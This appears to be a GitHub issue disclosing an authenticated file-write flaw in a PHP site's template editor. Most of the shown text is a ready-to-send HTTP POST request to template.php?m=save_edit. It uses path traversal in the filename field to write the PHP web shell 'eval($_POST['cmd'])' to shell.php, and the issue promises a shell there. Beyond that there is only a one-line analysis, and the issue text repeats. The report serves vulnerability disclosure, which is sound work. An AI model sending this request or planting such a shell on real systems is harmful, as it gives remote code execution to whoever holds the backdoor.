You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
after login ,get PHPSESSID in cookies
Use the following package,and change cookie's PHPSESSID as your's,then post it( admin path need set your manager path ,like mine is root/template.php )
POST /root/template.php?m=save_edit HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=46484b62e3d497a201990a7786121dd5;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
content=<?php eval($_POST['cmd']);?>&filename=../../shell.php
and you can get a shell in /shell.php
analysis
file /admin/template.php line 93
the filename and content whithout any filer
The text was updated successfully, but these errors were encountered:
poc
after login ,get PHPSESSID in cookies
Use the following package,and change cookie's PHPSESSID as your's,then post it( admin path need set your manager path ,like mine is
root/template.php)and you can get a shell in
/shell.phpanalysis
file /admin/template.php line 93
the filename and content whithout any filer
The text was updated successfully, but these errors were encountered: